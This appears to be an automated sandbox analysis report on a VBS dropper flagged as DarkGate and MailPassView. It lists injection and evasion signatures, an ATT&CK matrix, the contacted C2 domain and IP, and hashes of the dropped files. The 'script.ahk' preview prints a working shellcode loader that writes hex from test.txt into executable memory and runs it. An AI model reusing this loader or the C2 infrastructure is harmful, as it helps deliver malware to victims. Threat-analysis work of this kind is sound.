            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0049E2D5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0049E2D5
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004A1856 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_004A1856

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Benign windows process drops PE files
            Source: C:\Windows\System32\wscript.exeFile created: AutoHotkey.exe.0.drJump to dropped file
            System process connects to network (likely due to code injection or exploit)
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 205.234.201.153 80Jump to behavior
            Contains functionality to inject code into remote processes
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486DC09 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,1_2_0486DC09
            Contains functionality to inject threads in other processes
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0486DC09 CreateProcessA,CreateProcessA,OpenProcess,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,1_2_0486DC09
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0043B100 GetFileAttributesW,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,__wcsicoll,_memset,__swprintf,CreateProcessW,CloseHandle,CloseHandle,GetLastError,_memset,__wcsicoll,_wcschr,SetCurrentDirectoryW,_wcschr,_wcschr,GetFileAttributesW,_wcschr,SetCurrentDirectoryW,ShellExecuteExW,GetModuleHandleW,GetProcAddress,GetLastError,FormatMessageW,1_2_0043B100
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_00418020 keybd_event,GetTickCount,GetForegroundWindow,GetWindowTextW,1_2_00418020
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_004172F0 GetAsyncKeyState,GetSystemMetrics,GetSystemMetrics,GetCursorPos,WindowFromPoint,GetWindowThreadProcessId,SendMessageW,mouse_event,mouse_event,1_2_004172F0
            Source: C:\Windows\System32\wscript.exeProcess created: C:\NwiQ\AutoHotkey.exe "C:\NwiQ\Autohotkey.exe" "c:\NwiQ\script.ahk"Jump to behavior
            Source: AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.drBinary or memory string: 5A`7ATextLEFTLRIGHTRMIDDLEMX1X2WUWDWLWR{Blind}{ClickLl{}^+!#{}RawTempASC U+ ,LWin RWin LShift RShift LCtrl RCtrl LAlt RAlt SYSTEM\CurrentControlSet\Control\Keyboard Layouts\Layout FileKbdLayerDescriptorsc%03Xvk%02XSCALTDOWNALTUPSHIFTDOWNSHIFTUPCTRLDOWNCONTROLDOWNCTRLUPCONTROLUPLWINDOWNLWINUPRWINDOWNRWINUPRtlGetVersionntdll.dll%u.%u.%uStdOutAllUnreachableClassOverwriteUseEnvLocalSameAsGlobalUseUnsetGlobalUseUnsetLocalYYYYYWeekYearYDayWorkingDirWinDirWinDelayWDayUserNameTitleMatchModeSpeedTitleMatchModeTimeSinceThisHotkeyTimeSincePriorHotkeyTimeIdlePhysicalTimeIdleMouseTimeIdleKeyboardTimeIdleTickCountThisMenuItemPosThisMenuItemThisMenuThisLabelThisHotkeyThisFuncStoreCapslockModeStartupCommonStartupStartMenuCommonStartMenuSecScriptNameScriptHwndScriptFullPathScriptDirScreenWidthScreenHeightScreenDPIRegViewPtrSizeProgramsCommonProgramsPriorKeyPriorHotkeyOSVersionOSTypeNumBatchLinesNowUTCNowMyDocumentsMSecMouseDelayPlayMouseDelayMonMMMMMMMMMMinMDayLoopRegTypeLoopRegTimeModifiedLoopRegSubKeyLoopRegNameLoopRegKeyLoopReadLineLoopFileTimeModifiedLoopFileTimeCreatedLoopFileTimeAccessedLoopFileSizeMBLoopFileSizeKBLoopFileSizeLoopFileShortPathLoopFileShortNameLoopFilePathLoopFileNameLoopFileLongPathLoopFileFullPathLoopFileExtLoopFileDirLoopFileAttribLoopFieldLineNumberLineFileLastErrorLanguageKeyDurationPlayKeyDurationKeyDelayPlayKeyDelayIsUnicodeIsSuspendedIsPausedIsCriticalIsCompiledIsAdminIs64bitOSIPAddress4IPAddress3IPAddress2IPAddress1InitialWorkingDirIndexIconTipIconNumberIconHiddenIconFileHourGuiYGuiXGuiWidthGuiHeightGuiEventGuiControlEventFormatIntegerFormatFloatExitReasonEventInfoEndCharDesktopCommonDesktopDefaultTreeViewDefaultMouseSpeedDefaultListViewDefaultGuiDDDDDDDDDCursorCoordModeToolTipCoordModePixelCoordModeMouseCoordModeMenuCoordModeCaretControlDelayComputerNameCaretYCaretXBatchLinesAppDataCommonAppDataAhkVersionAhkPathTrueProgramFilesFalseComSpecClipboardAllClipboard...%s[%Iu of %Iu]: %-1.60s%sPropertyRegExMatch\:\:REG_SZREG_EXPAND_SZREG_MULTI_SZREG_DWORDREG_BINARYDefault3264MasterSpeakersHeadphonesDigitalLineMicrophoneSynthCDTelephonePCSpeakerWaveAuxAnalogVolVolumeOnOffMuteMonoLoudnessStereoEnhBassBoostPanQSoundPanBassTrebleEqualizerRegExFASTSLOWMonitorCountMonitorPrimaryMonitorMonitorWorkAreaMonitorNameAscChrDerefHTMLModPowExpSqrtLogLnRoundCeilFloorAbsSinCosTanASinACosATanBitAndBitOrBitXOrBitNotBitShiftLeftBitShiftRightShowAddRenameCheckUncheckToggleCheckEnableDisableToggleEnableStandardNoStandardColorNoDefaultDeleteAllTipIconNoIconMainWindowNoMainWindowSubmitCancelHideMinimizeMaximizeRestoreDestroyMarginFontListViewTreeViewFlashNewMoveMoveDrawFocusChooseChooseStringPosFocusVEnabledVisibleHwndNameButtonCheckboxRadioDDLDropDownListComboBoxListBoxUpDownSliderTab2Tab3GroupBoxPicPictureDateTimeMonthCalStatusBarActiveXLinkCustomPriorityInterruptNoTimersCloseWaitCloseStyleExStyleShowDropDownHideDropDownTabLeftTabRightEditPasteCheckedFindStringChoiceListLineCountCurrentLineCurrentColSelectedEjectLockUnlockLabelFileSystemFSSetLabel:SerialTypeS
            Source: AutoHotkey.exeBinary or memory string: Program Manager
            Source: AutoHotkey.exeBinary or memory string: Shell_TrayWnd
            Source: AutoHotkey.exe.0.drBinary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: C:\NwiQ\AutoHotkey.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,1_2_04846735
            Source: C:\NwiQ\AutoHotkey.exeCode function: GetLocaleInfoA,GetACP,1_2_0484D6F5
            Source: C:\NwiQ\AutoHotkey.exeCode function: GetLocaleInfoA,1_2_0484C08D
            Source: C:\NwiQ\AutoHotkey.exeCode function: GetLocaleInfoA,1_2_04847089
            Source: C:\NwiQ\AutoHotkey.exeCode function: GetLocaleInfoA,1_2_0484C0D9
            Source: C:\NwiQ\AutoHotkey.exeCode function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,1_2_0484683F
            Source: C:\NwiQ\AutoHotkey.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\NwiQ\AutoHotkey.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\NwiQ\AutoHotkey.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\NwiQ\file.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\NwiQ\file.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\NwiQ\file.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\NwiQ\file.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\NwiQ\file.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\NwiQ\file.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\NwiQ\file.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\NwiQ\file.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\NwiQ\file.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\NwiQ\file.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\NwiQ\file.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\NwiQ\file.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\NwiQ\file.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0041EF50 GetFileAttributesW,SetCurrentDirectoryW,GetSystemTimeAsFileTime,1_2_0041EF50
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0044F450 GetComputerNameW,GetUserNameW,1_2_0044F450
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0041A00E RtlGetVersion,__snwprintf,1_2_0041A00E
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: mcshield.exe
            Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: superantispyware.exe

            Stealing of Sensitive Information

            barindex
            Yara detected DarkGate
            Source: Yara matchFile source: 00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
            Yara detected MailPassView
            Source: Yara matchFile source: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
            Source: AutoHotkey.exeBinary or memory string: WIN_XP
            Source: AutoHotkey.exe.0.drBinary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingleWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003WIN_2000%04hX0x%Ix*pPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkCountarraypcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCallbackCcFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfoGetProcessImageFileNameWpsapi
            Source: AutoHotkey.exeBinary or memory string: WIN_VISTA
            Source: AutoHotkey.exeBinary or memory string: WIN_7
            Source: AutoHotkey.exeBinary or memory string: WIN_8
            Source: AutoHotkey.exeBinary or memory string: WIN_8.1

            Remote Access Functionality

            barindex
            Yara detected DarkGate
            Source: Yara matchFile source: 00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0041E430 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain,1_2_0041E430
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0041D9D0 Shell_NotifyIconW,RemoveClipboardFormatListener,ChangeClipboardChain,DestroyWindow,DestroyWindow,DeleteObject,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DeleteObject,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,mciSendStringW,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,_free,_free,_free,1_2_0041D9D0
            Source: C:\NwiQ\AutoHotkey.exeCode function: 1_2_0485CA8D bind,1_2_0485CA8D

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information221
            Scripting            		Valid Accounts2
            Native API            		221
            Scripting            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		121
            Input Capture            		1
            System Time Discovery            		Remote Services1
            Archive Collected Data            		3
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Deobfuscate/Decode Files or Information            		LSASS Memory1
            Account Discovery            		Remote Desktop Protocol1
            Screen Capture            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAt1
            Create Account            		1
            Access Token Manipulation            		3
            Obfuscated Files or Information            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares121
            Input Capture            		3
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook312
            Process Injection            		1
            DLL Side-Loading            		NTDS57
            System Information Discovery            		Distributed Component Object Model3
            Clipboard Data            		13
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading            		LSA Secrets131
            Security Software Discovery            		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            Access Token Manipulation            		Cached Domain Credentials3
            Process Discovery            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items312
            Process Injection            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            System Owner/User Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            ndvdikok.vbs8%ReversingLabs
            ndvdikok.vbs15%VirustotalBrowse

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\NwiQ\AutoHotkey.exe4%ReversingLabs
            C:\NwiQ\AutoHotkey.exe1%VirustotalBrowse

            Unpacked PE Files

            No Antivirus matches

            Domains

            SourceDetectionScannerLabelLink
            backupssupport.com0%VirustotalBrowse

            URLs

            SourceDetectionScannerLabelLink
            https://autohotkey.comCould0%URL Reputationsafe
            http://backupssupport.com/fykbmgszj1%VirustotalBrowse
            http://backupssupport.com/fykbmgsz0%VirustotalBrowse

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            backupssupport.com
            		205.234.201.153
            		truetrueunknown

            Contacted URLs

            NameMaliciousAntivirus DetectionReputation
            http://backupssupport.com/fykbmgsztrueunknown

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://backupssupport.com/fykbmgszjwscript.exe, 00000000.00000003.1656750950.000001D5A3C95000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1659182934.000001D5A3C9F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1658042445.000001D5A3C9E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
            https://autohotkey.comAutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.drfalse
              		high
              http://backupssupport.com/fykbmgsz6wscript.exe, 00000000.00000003.1655755076.000001D5A3CE7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1660138257.000001D5A3D19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1655827819.000001D5A3D13000.00000004.00000020.00020000.00000000.sdmpfalse
                		unknown
                https://autohotkey.comCouldAutoHotkey.exe, 00000001.00000002.1664273844.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe, 00000001.00000000.1655102872.00000000004AD000.00000002.00000001.01000000.00000008.sdmp, AutoHotkey.exe.0.drfalse
                • URL Reputation: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                205.234.201.153
                		backupssupport.comUnited States
                		23352SERVERCENTRALUStrue

                General Information

                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1427163
                Start date and time:2024-04-17 06:39:07 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 3m 37s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:2
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:ndvdikok.vbs
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winVBS@3/7@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 62
                • Number of non-executed functions: 252
                Cookbook Comments:
                • Found application associated with file extension: .vbs
                • Stop behavior analysis, all processes terminated

                Warnings

                • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Report size getting too big, too many NtEnumerateKey calls found.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                06:39:56API Interceptor1x Sleep call for process: AutoHotkey.exe modified

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                SERVERCENTRALUShttps://ym6hc4gbb.cc.rs6.net/tn.jsp?f=001n209emIAeC5QJJGtmLyCc1JCQhC6WWTJBpDN65UPPB3G7Jc3gS6FE5wY-dlsmfGB2oibtx69nM243xkUAk5hSfd1krgPjddqmNEffcBMlXoUc-7UzTKQzIO6cFbowvNDiHeCqkvDBf2IjYJyuuzL-7jENnNra-V4&c=&ch=&__=///cpsess/guytrscdvfhgjbknkghjfbghklnm/hgjbdsaknjaxbgrak/ryan_howard@office.comGet hashmaliciousHTMLPhisherBrowse
                • 205.234.232.49
                Scan001-929999.exeGet hashmaliciousFormBookBrowse
                • 198.38.83.196
                Axis Bank - 67 Account Pending Bank Receipt.pdf.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                • 198.38.83.196
                YzMjpENqal.elfGet hashmaliciousMirai, MoobotBrowse
                • 75.102.41.230
                2OVvfRwf5G.dllGet hashmaliciousPikaBotBrowse
                • 198.38.94.213
                2OVvfRwf5G.dllGet hashmaliciousPikaBotBrowse
                • 198.38.94.213
                Total Energies RFQ.exeGet hashmaliciousFormBookBrowse
                • 198.38.83.196
                6772.png.dllGet hashmaliciousUnknownBrowse
                • 198.38.94.213
                6772.png.dllGet hashmaliciousUnknownBrowse
                • 198.38.94.213
                7668.png.dllGet hashmaliciousUnknownBrowse
                • 198.38.94.213

                JA3 Fingerprints

                No context

                Dropped Files

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                C:\NwiQ\AutoHotkey.exe4_10_AC-7539.xlsxGet hashmaliciousDarkGate, MailPassViewBrowse
                  statapril2024-5892.xlsxGet hashmaliciousDarkGate, MailPassViewBrowse
                    statapril2024-7320.xlsxGet hashmaliciousDarkGate, MailPassViewBrowse
                      MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbsGet hashmaliciousDarkGate, MailPassViewBrowse
                        30ab11853092ccfc7359bb9cf99fe27b2179a1dc11037515b9367b6c28395850.zipGet hashmaliciousDarkGate, MailPassViewBrowse
                          Report-26-2024.vbsGet hashmaliciousDarkGate, MailPassViewBrowse
                            march19-D8176-2024.xlsxGet hashmaliciousDarkGate, MailPassViewBrowse
                              march19-D5116-2024.xlsxGet hashmaliciousMailPassViewBrowse
                                march19-D8295-2024.xlsxGet hashmaliciousDarkGate, MailPassViewBrowse
                                  march19-D2816-2024.xlsxGet hashmaliciousMailPassViewBrowse

                                    Created / dropped Files

                                    C:\NwiQ\AutoHotkey.exe

                                    Download File
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Category:dropped
                                    Size (bytes):913920
                                    Entropy (8bit):6.508000668604986
                                    Encrypted:false
                                    SSDEEP:24576:bGzl9+a4Ne1nEFI56xU+0IdY2Zv952uetfbFEzP4UFhOt:b+tOWnEFZR0El0JEzQAh
                                    MD5:A59A2D3E5DDA7ACA6EC879263AA42FD3
                                    SHA1:312D496EC90EB30D5319307D47BFEF602B6B8C6C
                                    SHA-256:897B0D0E64CF87AC7086241C86F757F3C94D6826F949A1F0FEC9C40892C0CECB
                                    SHA-512:852972CA4D7F9141EA56D3498388C61610492D36EA7D7AF1B36D192D7E04DD6D9BC5830E0DCB0A5F8F55350D4D8AAAC2869477686B03F998AFFBAC6321A22030
                                    Malicious:true
                                    Antivirus:
                                    • Antivirus: ReversingLabs, Detection: 4%
                                    • Antivirus: Virustotal, Detection: 1%, Browse
                                    Joe Sandbox View:
                                    • Filename: 4_10_AC-7539.xlsx, Detection: malicious, Browse
                                    • Filename: statapril2024-5892.xlsx, Detection: malicious, Browse
                                    • Filename: statapril2024-7320.xlsx, Detection: malicious, Browse
                                    • Filename: MS_EXCEL_AZURE_CLOUD_OPEN_DOCUMENT.vbs, Detection: malicious, Browse
                                    • Filename: 30ab11853092ccfc7359bb9cf99fe27b2179a1dc11037515b9367b6c28395850.zip, Detection: malicious, Browse
                                    • Filename: Report-26-2024.vbs, Detection: malicious, Browse
                                    • Filename: march19-D8176-2024.xlsx, Detection: malicious, Browse
                                    • Filename: march19-D5116-2024.xlsx, Detection: malicious, Browse
                                    • Filename: march19-D8295-2024.xlsx, Detection: malicious, Browse
                                    • Filename: march19-D2816-2024.xlsx, Detection: malicious, Browse
                                    Reputation:moderate, very likely benign file
                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h.\...\...\.....]...G5..i...G5.....U..T...U..A...\.......G5..|...G5..w...G5..]...G5..]...Rich\...........PE..L...J.d..........................................@...........................................@.............................t...,....................................................................................................................text...Q........................... ..`.rdata..ha.......b..................@..@.data........@...4...&..............@....rsrc................Z..............@..@................................................................................................................................................................................................................................................................................................................................................................

                                    C:\NwiQ\file.zip

                                    Download File
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                    Category:dropped
                                    Size (bytes):795674
                                    Entropy (8bit):7.994720720467439
                                    Encrypted:true
                                    SSDEEP:24576:iDv3cPduvcaRMi59YF7neQfxdIhjRT2Wrp:ij9kBi7kLeQydT2Wrp
                                    MD5:60817831FC3EA259D45C9A537172F080
                                    SHA1:BC6BE7D44565B13E1008A3B962ABC9BC6EE44217
                                    SHA-256:75D89FD4AA29E97E8859BDF734602490DA0F90A4FD5213F737857D971C82E80C
                                    SHA-512:02FC5B1202897E0D1D99FF636AB43B9D4BB6335F1FC538BD63D361B4025584F8196504F4366668DC919C1C8CB52EEA3742FDF8746748DAE00BEF4AF0C606EBDD
                                    Malicious:false
                                    Reputation:low
                                    Preview:PK........G/.X[...Y...b.......test.txt..W..8.6.-.7.i....y...dUi.[.n..gZ.4p........~..7u.....u:.w...x.N...v.....|z....z.....v.....]...x..n~.....;.....>].....8n.~.w...z.....i............I.jy{s;.R]....T..?.....N[........F.......?...|=...s..*w>o4.....:.N...7./.._....?=..6..w...t;..83.:.....^.'m\..;]=..Nm[..N.|.v.sxj.....&z.....7...qz.N.......n.{<.4.?.@.~:..Fk.....wZ=..........j."..5...-m....0I.....`fw..._z....y......g..dV@R...9|{r;\.{P=.m..=..cZ.e{z....U...(..s.........Q..v:.g...YS.....=X....p2sw.y..Y.khb\.cFs..........3.5..4=...fb.gp....`..?..b.o....k...m*........vw.K.............W}......8..%u...=}.7.3..qo..r..A...>R[...6....._'3..3...C.n..p...kj..g.6F|..;3...z...2CQ`.8.n.R..p..........SyP(*.C. .:...5|AQ.C.....q.......h..^.:.B.0i.3.w..j<..R..V<)...`Vj~.......@...P..d....u.Bh.,0............,.`Lf.Ld.-..o/.....Iy..>m.w.Y....+..3.F..[(...|..._(F3..................sj=.Z...6....)..Z.....`......./..xzW.pW=..Y<9|+...}s.}.j.. .....`....(.D..z..i.[

                                    C:\NwiQ\script.ahk

                                    Download File
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):441
                                    Entropy (8bit):5.2568075754664525
                                    Encrypted:false
                                    SSDEEP:6:8kYWQxcpC1ogdG+GbBWcQdSIurioqqu3DHzJsaum8rkwHYF6DtGy1xk5QQNP0Pa8:LQxcpCeY0Ojo1uLdsa7e4YD/ktVsKVnw
                                    MD5:334F3FD6C9FE35FA7D5E7D2780D636EE
                                    SHA1:127F6BC9B9A42BF7036C3F39D66C87D32CDDEAA2
                                    SHA-256:1C4D704DCF8A341A8A6129743B1EB84681D53C4459CDB62FE2954E41ADFED961
                                    SHA-512:03389F83F96D6641E60003B6787A2F2726FC0AFFB6DE9B9F92512FC79C49CA1C8D5448E3111F696CA1AA1C2B7268017F819E56292E8A3ED7D2D5F9224EFB8E22
                                    Malicious:false
                                    Reputation:low
                                    Preview:..#NoTrayIcon....slgpdnza := 0x1000....asokscij := 0x2000....adloayls := 0x40....urooxwyd := A_ScriptDir . "\test.txt"....FileRead, cpduezil, %urooxwyd%....size := 476465....uatxhuds := DllCall("VirtualAlloc", "Ptr", 0, "UInt", size, "UInt", slgpdnza | asokscij, "UInt", adloayls)....Loop, % size {....wcttobbp := "0x" . SubStr(cpduezil, 2 * A_Index - 1, 2)....NumPut(wcttobbp, uatxhuds + (A_Index - 1), "Char")....}....DllCall(uatxhuds)....

                                    C:\NwiQ\test.txt

                                    Download File
                                    Process:C:\Windows\System32\wscript.exe
                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                    Category:dropped
                                    Size (bytes):952930
                                    Entropy (8bit):3.5855231265302026
                                    Encrypted:false
                                    SSDEEP:12288:aaxFc9Kd5DbbWr8McQ/Rk4iailK/RjPwr0Xl/rbXjQ108Xk0RPopY+wM2e8dQm9D:T7EUIN9S
                                    MD5:09D0DF57B9E2D00852322828D9791BEC
